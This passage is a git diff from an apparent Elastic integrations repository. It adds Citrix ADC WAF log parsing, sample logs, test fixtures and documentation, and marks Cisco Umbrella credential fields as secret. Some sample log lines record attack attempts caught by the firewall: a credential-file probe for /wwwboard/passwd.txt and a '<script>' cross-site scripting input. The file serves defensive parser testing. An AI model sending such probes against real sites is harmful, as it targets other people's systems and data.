Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - edr_xdr conditions: kibana: - version: "^8.7.1" + version: "^8.12.0" icons: - src: /img/cisco.svg title: cisco diff --git a/packages/cisco_umbrella/changelog.yml b/packages/cisco_umbrella/changelog.yml index cb4f3d8723e..15490463e81 100644 --- a/packages/cisco_umbrella/changelog.yml +++ b/packages/cisco_umbrella/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.22.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "1.21.2" changes: - description: Changed owners diff --git a/packages/cisco_umbrella/data_stream/log/manifest.yml b/packages/cisco_umbrella/data_stream/log/manifest.yml index f4f8dda13ca..4f2663816ea 100644 --- a/packages/cisco_umbrella/data_stream/log/manifest.yml +++ b/packages/cisco_umbrella/data_stream/log/manifest.yml @@ -71,18 +71,21 @@ streams: multi: false required: false show_user: true + secret: false - name: secret_access_key - type: text + type: password title: Secret Access Key multi: false required: false show_user: true + secret: true - name: session_token - type: text + type: password title: Session Token multi: false required: false show_user: true + secret: true - name: role_arn type: text title: Role ARN diff --git a/packages/cisco_umbrella/manifest.yml b/packages/cisco_umbrella/manifest.yml index bf5fe6ec698..5351984ec13 100644 --- a/packages/cisco_umbrella/manifest.yml +++ b/packages/cisco_umbrella/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: cisco_umbrella title: Cisco Umbrella -version: "1.21.2" +version: "1.22.0" description: Collect logs from Cisco Umbrella with Elastic Agent. type: integration categories: @@ -10,7 +10,7 @@ categories: - dns_security conditions: kibana: - version: "^8.4.0" + version: "^8.12.0" icons: - src: /img/cisco.svg title: cisco diff --git a/packages/citrix_adc/_dev/build/build.yml b/packages/citrix_adc/_dev/build/build.yml index 8d9e4bf7ac8..55ea148e1b1 100644 --- a/packages/citrix_adc/_dev/build/build.yml +++ b/packages/citrix_adc/_dev/build/build.yml @@ -1,3 +1,4 @@ dependencies: ecs: reference: git@v8.4.0 + import_mappings: true diff --git a/packages/citrix_adc/_dev/build/docs/README.md b/packages/citrix_adc/_dev/build/docs/README.md index 8598f0ad860..6caacecbad7 100644 --- a/packages/citrix_adc/_dev/build/docs/README.md +++ b/packages/citrix_adc/_dev/build/docs/README.md @@ -4,9 +4,11 @@ The Citrix ADC integration allows you to monitor your Citrix ADC instance. Citrix ADC is an application delivery controller that performs application-specific traffic analysis to intelligently distribute, optimize, and secure Layer 4 - Layer 7 (L4–L7) network traffic for web applications. +The Citrix Web App Firewall prevents security breaches, data loss, and possible unauthorized modifications to websites that access sensitive business or customer information. It does so by filtering both requests and responses, examining them for evidence of malicious activity, and blocking requests that exhibit such activity. Your site is protected not only from common types of attacks, but also from new, as yet unknown attacks. In addition to protecting web servers and websites from unauthorized access, the Web App Firewall protects against vulnerabilities in legacy CGI code or scripts, web frameworks, web server software, and other underlying operating systems. + Use the Citrix ADC integration to: -Collect metrics related to the interface, lbvserver, service, system and vpn. +Collect metrics related to the interface, lbvserver, service, system, vpn and logs. Create visualizations to monitor, measure and analyze the usage trend and key data, and derive business insights. Create alerts to reduce the MTTD and also the MTTR by referencing relevant logs when troubleshooting an issue. @@ -18,12 +20,37 @@ The Citrix ADC integration collects metrics data. Metrics give you insight into the statistics of the Citrix ADC. Metrics data streams collected by the Citrix ADC integration include [interface](https://developer-docs.citrix.com/projects/netscaler-nitro-api/en/12.0/statistics/network/interface/), [lbvserver](https://developer-docs.citrix.com/projects/netscaler-nitro-api/en/12.0/statistics/lb/lbvserver/), [service](https://developer-docs.citrix.com/projects/netscaler-nitro-api/en/12.0/statistics/basic/service/), [system](https://developer-docs.citrix.com/projects/netscaler-nitro-api/en/12.0/statistics/system/system/) and [vpn](https://developer-docs.citrix.com/projects/netscaler-nitro-api/en/12.0/statistics/vpn/vpn/), so that the user could monitor and troubleshoot the performance of the Citrix ADC instances. +**Log** is used to retrieve Citrix Netscaler logs. See more details in the documentation [here](https://developer-docs.netscaler.com/en-us/netscaler-syslog-message-reference/current-release). + Note: -- Users can monitor and see the metrics inside the ingested documents for Citrix ADC in the logs-* index pattern from `Discover`. +- Users can monitor and see the metrics and logs inside the ingested documents for Citrix ADC in the logs-* index pattern from `Discover`. +## Requirements + +Elastic Agent must be installed. For more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +### Installing and managing an Elastic Agent: + +You have a few options for installing and managing an Elastic Agent: + +### Install a Fleet-managed Elastic Agent (recommended): + +With this approach, you install Elastic Agent and use Fleet in Kibana to define, configure, and manage your agents in a central location. We recommend using Fleet management because it makes the management and upgrade of your agents considerably easier. + +### Install Elastic Agent in standalone mode (advanced users): + +With this approach, you install Elastic Agent and manually configure the agent locally on the system where it’s installed. You are responsible for managing and upgrading the agents. This approach is reserved for advanced users only. + +### Install Elastic Agent in a containerized environment: + +You can run Elastic Agent inside a container, either with Fleet Server or standalone. Docker images for all versions of Elastic Agent are available from the Elastic Docker registry, and we provide deployment manifests for running on Kubernetes. + +There are some minimum requirements for running Elastic Agent and for more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +The minimum **Kibana version** required is **8.12.0**. ## Compatibility -This integration has been tested against Citrix ADC `v13.0` and `v13.1`. +This integration has been tested against Citrix ADC `v13.0`, `v13.1` and `v14.1`. ## Prerequisites @@ -39,10 +66,41 @@ Example Host Configuration: `http://localhost:9080` For step-by-step instructions on how to set up an integration, see the [Getting started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. +### Steps for configuring CEF format: + +1. Navigate to **Security** the NetScaler GUI. +2. Click **Application Firewall** node. +3. Select Change Engine Settings. +4. Enable CEF Logging. + +**Note**: It is recommended to configure the application firewall to enable CEF-formatted logs. + +### Steps for configuring Syslog format: + +The Citrix WAF GUI can be used to configure syslog servers and WAF message types to be sent to the syslog servers. Refer to [How to Send Application Firewall Messages to a Separate Syslog Server](https://support.citrix.com/article/CTX138973) and [How to Send NetScaler Application Firewall Logs to Syslog Server and NS.log](https://support.citrix.com/article/CTX211543) for details. + ## Validation After the integration is successfully configured, clicking on the Assets tab of the Citrix ADC Integration should display a list of available dashboards. Click on the dashboard available for your configured datastream. It should be populated with the required data. +### Enabling the integration in Elastic: + +1. In Kibana go to Management > Integrations +2. In "Search for integrations" search bar, type Citrix ADC +3. Click on the "Citrix ADC" integration from the search results. +4. Click on the "Add Citrix ADC" button to add the integration. +5. While adding the integration, if you want to collect logs via logfile, keep **Collect logs from Citrix ADC via file** toggle on and then configure following parameters: + - Paths + + or if you want to collect logs via TCP, keep **Collect logs from Citrix ADC via TCP** toggle on and then configure following parameters: + - Listen Address + - Listen Port + + or if you want to collect logs via UDP, keep **Collect logs from Citrix ADC via UDP** toggle on and and then configure following parameters: + - Listen Address + - Listen Port +6. Save the integration. + ### Troubleshooting #### Dummy values @@ -94,4 +152,12 @@ This is the `vpn` data stream. Citrix VPN is the add-on that provides full Secur {{event "vpn"}} -{{fields "vpn"}} \ No newline at end of file +{{fields "vpn"}} + +### Logs + +The `citrix_adc.log` dataset provides events from the configured syslog server. + +{{event "log"}} + +{{fields "log"}} \ No newline at end of file diff --git a/packages/citrix_adc/_dev/deploy/docker/docker-compose.yml b/packages/citrix_adc/_dev/deploy/docker/docker-compose.yml old mode 100755 new mode 100644 index 52d22e823ff..d65e91d367c --- a/packages/citrix_adc/_dev/deploy/docker/docker-compose.yml +++ b/packages/citrix_adc/_dev/deploy/docker/docker-compose.yml @@ -13,3 +13,24 @@ services: - http-server - --addr=:8080 - --config=/files/config.yml + citrix-adc-logfile: + image: alpine + volumes: + - ./sample_logs:/sample_logs:ro + - ${SERVICE_LOGS_DIR}:/var/log + command: /bin/sh -c "cp /sample_logs/* /var/log/" + citrix-adc-tls: + image: docker.elastic.co/observability/stream:v0.8.0 + volumes: + - ./sample_logs:/sample_logs:ro + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9561 -p=tls --insecure /sample_logs/citrix-adc.log + citrix-adc-tcp: + image: docker.elastic.co/observability/stream:v0.8.0 + volumes: + - ./sample_logs:/sample_logs:ro + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9560 -p=tcp /sample_logs/citrix-adc.log + citrix-adc-udp: + image: docker.elastic.co/observability/stream:v0.8.0 + volumes: + - ./sample_logs:/sample_logs:ro + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9560 -p=udp /sample_logs/citrix-adc.log diff --git a/packages/citrix_adc/_dev/deploy/docker/sample_logs/citrix-adc.log b/packages/citrix_adc/_dev/deploy/docker/sample_logs/citrix-adc.log new file mode 100644 index 00000000000..4ba3239d8f3 --- /dev/null +++ b/packages/citrix_adc/_dev/deploy/docker/sample_logs/citrix-adc.log @@ -0,0 +1,16 @@ +Jun 12 23:37:17 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 spt=47606 method=GET request=http://aaron.stratum8.net/FFC/login.html msg=Disallow Illegal URL. cn1=1340 cn2=653 cs1=pr_ffc cs2=PPE1 cs3=EsdGd3VD0OaaURLcZnj05Y6DOmE0002 cs4=ALERT cs5=2015 act=blocked +Jun 13 00:21:28 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_FIELDCONSISTENCY|6|src=175.16.199.1 spt=761 method=GET request=http://aaron.stratum8.net/FFC/login.php?login_name=abc&passwd=123456789234&drinking_pref=on&text_area=&loginButton=ClickToLogin&as_sfid=AAAAAAWIahZuYoIFbjBhYMP05mJLTwEfIY0a7AKGMg3jIBaKmwtK4t7M7lNxOgj7Gmd3SZc8KUj6CR6a7W5kIWDRHN8PtK1Zc-txHkHNx1WknuG9DzTuM7t1THhluevXu9I4kp8%3D&as_fid=feeec8758b41740eedeeb6b35b85dfd3d5def30c msg=Field consistency check failed for field passwd cn1=1401 cn2=707 cs1=pr_ffc cs2=PPE1 cs3=Ycby5IvjL6FoVa6Ah94QFTIUpC80001 cs4=ALERT cs5=2015 act=not blocked +Jun 13 00:25:31 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_SAFECOMMERCE|6|src=175.16.199.1 spt=34041 method=GET request=http://aaron.stratum8.net/FFC/CreditCardMind.html msg=Maximum number of potential credit card numbers seen cn1=1470 cn2=708 cs1=pr_ffc cs2=PPE1 cs3=Ycby5IvjL6FoVa6Ah94QFTIUpC80001 cs4=ALERT cs5=2015 act=transformed +Jun 13 01:11:09 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_SIGNATURE_MATCH|6|src=175.16.199.1 spt=61141 method=GET request=http://aaron.stratum8.net/FFC/wwwboard/passwd.txt msg=Signature violation rule ID 807: web-cgi /wwwboard/passwd.txt access cn1=140 cn2=841 cs1=pr_ffc cs2=PPE0 cs3=OyTgjbXBqcpBFeENKDlde3OkMQ00001 cs4=ALERT cs5=2015 cs6=web-cgi act=blocked +June 8 00:21:09 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 geolocation=NorthAmerica.US.Arizona.Tucson.*.* spt=18655 method=GET request=http://aaron.stratum8.net/FFC/login.html msg=Disallow Illegal URL. cn1=77 cn2=1547 cs1=test_pr_adv cs2=PPE1 cs3=KDynjg1pbFtfhC/nt0rBU1o/Tyg0001 cs4=ALERT cs5=2015 act=not blocked +June 9 23:50:53 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 geolocation=Unknown spt=5086 method=GET request=http://aaron.stratum8.net/FFC/login.html msg=Disallow Illegal URL. cn1=74 cn2=1576 cs1=test_pr_adv cs2=PPE2 cs3=PyR0eOEM4gf6GJiTyauiHByL88E0002 cs4=ALERT cs5=2015 act=not blocked +Dec 19 00:38:09 81.2.69.144 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_SAFECOMMERCE_XFORM|6|src=175.16.199.1 spt=56116 method=GET request=http://vpx247.example.net/FFC/CreditCardMind.html msg= Transformed (xout) potential credit card numbers seen in server response cn1=652 cn2=610 cs1=pr_ffc cs2=PPE0 cs3=li8MdGfW49uG8tGdSV85ech41a0A000 cs4=ALERT cs5=2012 act=transformed +Dec 19 00:38:09 81.2.69.144 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_SAFECOMMERCE|6|src=175.16.199.1 spt=56116 method=GET request=http://vpx247.example.net/FFC/CreditCardMind.html msg= Maximum no. of potential credit card numbers seen cn1=653 cn2=610 cs1=pr_ffc cs2=PPE0 cs3=li8MdGfW49uG8tGdSV85ech41a0A000 cs4=ALERT cs5=2012 act=transformed +Dec 18 21:46:17 81.2.69.144 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 spt=54711 method=GET request=http://vpx247.example.net/FFC/login_post.html?abc\=def msg=Disallow Illegal URL. cn1=465 cn2=535 cs1=profile1 cs2=PPE0 cs3=IliG4Dxp1SjOhKVRDVBXmqvAaIcA000 cs4=ALERT cs5=2012 act=not blocked +Dec 19 01:07:56 81.2.69.144 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_SIGNATURE_MATCH|6|src=175.16.199.1 spt=56687 method=GET request=http://vpx247.example.net/FFC/wwwboard/passwd.txt msg= Signature violation rule ID 807: web-cgi /wwwboard/passwd.txt access cn1=224 cn2=205 cs1=pr_ffc cs2=PPE0 cs3=POousP7CIMW5nwZ5Rs4nq5DND0sA000 cs4=ALERT cs5=2012 act=not blocked +Jun 22 19:14:37 81.2.69.144 06/22/2015:19:14:37 GMT ns 0-PPE-1 : default APPFW APPFW_cross-site scripting 60 0 : 175.16.199.1 616-PPE1 y/3upt2K8ySWWId3Kavbxyni7Rw0000 pr_ffc http://aaron.stratum8.net/FFC/login.php?login_name=abc&passwd=12345&drinking_pref=on&text_area=%3Cscript%3E%0D%0A&loginButton=ClickToLogin&as_sfid=AAAAAAWEXcNQLlSokNmqaYF6dvfqlChNzSMsdyO9JXOJomm2vBwAMOqZIChv21EcgBc3rexIUcfm0vckKlsgoOeC_BArx1Ic4NLxxkWMtrJe4H7SOfkiv9NL7AG4juPIanTvVo%3D&as_fid=feeec8758b41740eedeeb6b35b85dfd3d5def30c Cross-site script check failed for field text_area="Bad tag: script" +Jun 22 19:14:37 81.2.69.144 12/04/2017:17:21:00 GMT citrix.netscaler.test 0-PPE-1 : SSLLOG SSL_HANDSHAKE_SUCCESS 5743593 0 : SPCBId 87630 - ClientIP 172.25.184.157 - ClientPort 19849 - VserverServiceIP 10.254.14.94 - VserverServicePort 443 - ClientVersion TLSv1.2 - CipherSuite "RC4-MD5 TLSv1.2 Non-Export 128-bit" - Session Reuse +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP CONN_DELINK 4471 0 : Source 192.168.10.10:52187 - Vserver 81.2.69.144:80 - NatIP 192.168.10.10:52187 - Destination 81.2.69.144:80 - Delink Time 10/06/2014:14:03:23 GMT - Total_bytes_send 1075 - Total_bytes_recv 352 +Oct 6 14:03:30 81.2.69.144 10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4472 0 : Source 192.168.10.35:80 - Destination 192.168.10.51:35341 - Start Time 10/06/2014:14:02:43 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1 +Oct 6 14:03:30 81.2.69.144 10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4473 0 : Source 127.0.0.1:7776 - Destination 127.0.0.2:55623 - Start Time 10/06/2014:14:02:45 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1 +Oct 6 14:03:30 81.2.69.144 10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4474 0 : Source 127.0.0.1:80 - Destination 127.0.0.2:39771 - Start Time 10/06/2014:14:02:46 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1 diff --git a/packages/citrix_adc/changelog.yml b/packages/citrix_adc/changelog.yml index a0142d9da62..27e8c940347 100644 --- a/packages/citrix_adc/changelog.yml +++ b/packages/citrix_adc/changelog.yml @@ -1,4 +1,29 @@ # newer versions go on top +- version: "1.5.1" + changes: + - description: Update description with log collection. + type: enhancement + link: https://github.com/elastic/integrations/pull/9562 +- version: "1.5.0" + changes: + - description: Add support of citrix_waf connector and enhance the syslog message. + type: enhancement + link: https://github.com/elastic/integrations/pull/9385 +- version: "1.4.0" + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: "1.3.1" + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: "1.3.0" + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: "1.2.0" changes: - description: Limit request tracer log count to five. diff --git a/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-citrix-waf-cef.log b/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-citrix-waf-cef.log new file mode 100644 index 00000000000..24ec5f26255 --- /dev/null +++ b/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-citrix-waf-cef.log @@ -0,0 +1,10 @@ +Jun 12 23:37:17 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 spt=47606 method=GET request=http://aaron.stratum8.net/FFC/login.html msg=Disallow Illegal URL. cn1=1340 cn2=653 cs1=pr_ffc cs2=PPE1 cs3=EsdGd3VD0OaaURLcZnj05Y6DOmE0002 cs4=ALERT cs5=2015 act=blocked +Jun 13 00:21:28 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_FIELDCONSISTENCY|6|src=175.16.199.1 spt=761 method=GET request=http://aaron.stratum8.net/FFC/login.php?login_name=abc&passwd=123456789234&drinking_pref=on&text_area=&loginButton=ClickToLogin&as_sfid=AAAAAAWIahZuYoIFbjBhYMP05mJLTwEfIY0a7AKGMg3jIBaKmwtK4t7M7lNxOgj7Gmd3SZc8KUj6CR6a7W5kIWDRHN8PtK1Zc-txHkHNx1WknuG9DzTuM7t1THhluevXu9I4kp8%3D&as_fid=feeec8758b41740eedeeb6b35b85dfd3d5def30c msg=Field consistency check failed for field passwd cn1=1401 cn2=707 cs1=pr_ffc cs2=PPE1 cs3=Ycby5IvjL6FoVa6Ah94QFTIUpC80001 cs4=ALERT cs5=2015 act=not blocked +Jun 13 00:25:31 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_SAFECOMMERCE|6|src=175.16.199.1 spt=34041 method=GET request=http://aaron.stratum8.net/FFC/CreditCardMind.html msg=Maximum number of potential credit card numbers seen cn1=1470 cn2=708 cs1=pr_ffc cs2=PPE1 cs3=Ycby5IvjL6FoVa6Ah94QFTIUpC80001 cs4=ALERT cs5=2015 act=transformed +Jun 13 01:11:09 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_SIGNATURE_MATCH|6|src=175.16.199.1 spt=61141 method=GET request=http://aaron.stratum8.net/FFC/wwwboard/passwd.txt msg=Signature violation rule ID 807: web-cgi /wwwboard/passwd.txt access cn1=140 cn2=841 cs1=pr_ffc cs2=PPE0 cs3=OyTgjbXBqcpBFeENKDlde3OkMQ00001 cs4=ALERT cs5=2015 cs6=web-cgi act=blocked +June 8 00:21:09 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 geolocation=NorthAmerica.US.Arizona.Tucson.*.* spt=18655 method=GET request=http://aaron.stratum8.net/FFC/login.html msg=Disallow Illegal URL. cn1=77 cn2=1547 cs1=test_pr_adv cs2=PPE1 cs3=KDynjg1pbFtfhC/nt0rBU1o/Tyg0001 cs4=ALERT cs5=2015 act=not blocked +June 9 23:50:53 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 geolocation=Unknown spt=5086 method=GET request=http://aaron.stratum8.net/FFC/login.html msg=Disallow Illegal URL. cn1=74 cn2=1576 cs1=test_pr_adv cs2=PPE2 cs3=PyR0eOEM4gf6GJiTyauiHByL88E0002 cs4=ALERT cs5=2015 act=not blocked +Dec 19 00:38:09 81.2.69.144 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_SAFECOMMERCE_XFORM|6|src=175.16.199.1 spt=56116 method=GET request=http://vpx247.example.net/FFC/CreditCardMind.html msg= Transformed (xout) potential credit card numbers seen in server response cn1=652 cn2=610 cs1=pr_ffc cs2=PPE0 cs3=li8MdGfW49uG8tGdSV85ech41a0A000 cs4=ALERT cs5=2012 act=transformed +Dec 19 00:38:09 81.2.69.144 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_SAFECOMMERCE|6|src=175.16.199.1 spt=56116 method=GET request=http://vpx247.example.net/FFC/CreditCardMind.html msg= Maximum no. of potential credit card numbers seen cn1=653 cn2=610 cs1=pr_ffc cs2=PPE0 cs3=li8MdGfW49uG8tGdSV85ech41a0A000 cs4=ALERT cs5=2012 act=transformed +Dec 18 21:46:17 81.2.69.144 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 spt=54711 method=GET request=http://vpx247.example.net/FFC/login_post.html?abc\=def msg=Disallow Illegal URL. cn1=465 cn2=535 cs1=profile1 cs2=PPE0 cs3=IliG4Dxp1SjOhKVRDVBXmqvAaIcA000 cs4=ALERT cs5=2012 act=not blocked +Dec 19 01:07:56 81.2.69.144 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_SIGNATURE_MATCH|6|src=175.16.199.1 spt=56687 method=GET request=http://vpx247.example.net/FFC/wwwboard/passwd.txt msg= Signature violation rule ID 807: web-cgi /wwwboard/passwd.txt access cn1=224 cn2=205 cs1=pr_ffc cs2=PPE0 cs3=POousP7CIMW5nwZ5Rs4nq5DND0sA000 cs4=ALERT cs5=2012 act=not blocked diff --git a/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-citrix-waf-cef.log-expected.json b/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-citrix-waf-cef.log-expected.json new file mode 100644 index 00000000000..f9b49654d5c --- /dev/null +++ b/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-citrix-waf-cef.log-expected.json @@ -0,0 +1,843 @@ +{ + "expected": [ + { + "@timestamp": "2015-06-12T23:37:17.000Z", + "citrix": { + "cef_format": true, + "cef_version": "0", + "detail": "CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 spt=47606 method=GET request=http://aaron.stratum8.net/FFC/login.html msg=Disallow Illegal URL. cn1=1340 cn2=653 cs1=pr_ffc cs2=PPE1 cs3=EsdGd3VD0OaaURLcZnj05Y6DOmE0002 cs4=ALERT cs5=2015 act=blocked", + "device_event_class_id": "APPFW", + "device_product": "NetScaler", + "device_vendor": "Citrix", + "device_version": "NS11.0", + "facility": "local0", + "name": "APPFW_STARTURL", + "ppe_id": "PPE1", + "priority": "info", + "profile_name": "pr_ffc", + "session_id": "EsdGd3VD0OaaURLcZnj05Y6DOmE0002", + "severity": "ALERT" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "blocked", + "id": "1340", + "original": "Jun 12 23:37:17 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 spt=47606 method=GET request=http://aaron.stratum8.net/FFC/login.html msg=Disallow Illegal URL. cn1=1340 cn2=653 cs1=pr_ffc cs2=PPE1 cs3=EsdGd3VD0OaaURLcZnj05Y6DOmE0002 cs4=ALERT cs5=2015 act=blocked", + "severity": 6, + "timezone": "UTC" + }, + "http": { + "request": { + "id": "653", + "method": "GET" + } + }, + "message": "Disallow Illegal URL.", + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "source": { + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "port": 47606 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "aaron.stratum8.net", + "extension": "html", + "original": "http://aaron.stratum8.net/FFC/login.html", + "path": "/FFC/login.html", + "scheme": "http" + } + }, + { + "@timestamp": "2015-06-13T00:21:28.000Z", + "citrix": { + "cef_format": true, + "cef_version": "0", + "detail": "CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_FIELDCONSISTENCY|6|src=175.16.199.1 spt=761 method=GET request=http://aaron.stratum8.net/FFC/login.php?login_name=abc&passwd=123456789234&drinking_pref=on&text_area=&loginButton=ClickToLogin&as_sfid=AAAAAAWIahZuYoIFbjBhYMP05mJLTwEfIY0a7AKGMg3jIBaKmwtK4t7M7lNxOgj7Gmd3SZc8KUj6CR6a7W5kIWDRHN8PtK1Zc-txHkHNx1WknuG9DzTuM7t1THhluevXu9I4kp8%3D&as_fid=feeec8758b41740eedeeb6b35b85dfd3d5def30c msg=Field consistency check failed for field passwd cn1=1401 cn2=707 cs1=pr_ffc cs2=PPE1 cs3=Ycby5IvjL6FoVa6Ah94QFTIUpC80001 cs4=ALERT cs5=2015 act=not blocked", + "device_event_class_id": "APPFW", + "device_product": "NetScaler", + "device_vendor": "Citrix", + "device_version": "NS11.0", + "facility": "local0", + "name": "APPFW_FIELDCONSISTENCY", + "ppe_id": "PPE1", + "priority": "info", + "profile_name": "pr_ffc", + "session_id": "Ycby5IvjL6FoVa6Ah94QFTIUpC80001", + "severity": "ALERT" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "not blocked", + "id": "1401", + "original": "Jun 13 00:21:28 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_FIELDCONSISTENCY|6|src=175.16.199.1 spt=761 method=GET request=http://aaron.stratum8.net/FFC/login.php?login_name=abc&passwd=123456789234&drinking_pref=on&text_area=&loginButton=ClickToLogin&as_sfid=AAAAAAWIahZuYoIFbjBhYMP05mJLTwEfIY0a7AKGMg3jIBaKmwtK4t7M7lNxOgj7Gmd3SZc8KUj6CR6a7W5kIWDRHN8PtK1Zc-txHkHNx1WknuG9DzTuM7t1THhluevXu9I4kp8%3D&as_fid=feeec8758b41740eedeeb6b35b85dfd3d5def30c msg=Field consistency check failed for field passwd cn1=1401 cn2=707 cs1=pr_ffc cs2=PPE1 cs3=Ycby5IvjL6FoVa6Ah94QFTIUpC80001 cs4=ALERT cs5=2015 act=not blocked", + "severity": 6, + "timezone": "UTC" + }, + "http": { + "request": { + "id": "707", + "method": "GET" + } + }, + "message": "Field consistency check failed for field passwd", + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "source": { + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "port": 761 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "aaron.stratum8.net", + "extension": "php", + "original": "http://aaron.stratum8.net/FFC/login.php?login_name=abc&passwd=123456789234&drinking_pref=on&text_area=&loginButton=ClickToLogin&as_sfid=AAAAAAWIahZuYoIFbjBhYMP05mJLTwEfIY0a7AKGMg3jIBaKmwtK4t7M7lNxOgj7Gmd3SZc8KUj6CR6a7W5kIWDRHN8PtK1Zc-txHkHNx1WknuG9DzTuM7t1THhluevXu9I4kp8%3D&as_fid=feeec8758b41740eedeeb6b35b85dfd3d5def30c", + "path": "/FFC/login.php", + "query": "login_name=abc&passwd=123456789234&drinking_pref=on&text_area=&loginButton=ClickToLogin&as_sfid=AAAAAAWIahZuYoIFbjBhYMP05mJLTwEfIY0a7AKGMg3jIBaKmwtK4t7M7lNxOgj7Gmd3SZc8KUj6CR6a7W5kIWDRHN8PtK1Zc-txHkHNx1WknuG9DzTuM7t1THhluevXu9I4kp8=&as_fid=feeec8758b41740eedeeb6b35b85dfd3d5def30c", + "scheme": "http" + } + }, + { + "@timestamp": "2015-06-13T00:25:31.000Z", + "citrix": { + "cef_format": true, + "cef_version": "0", + "detail": "CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_SAFECOMMERCE|6|src=175.16.199.1 spt=34041 method=GET request=http://aaron.stratum8.net/FFC/CreditCardMind.html msg=Maximum number of potential credit card numbers seen cn1=1470 cn2=708 cs1=pr_ffc cs2=PPE1 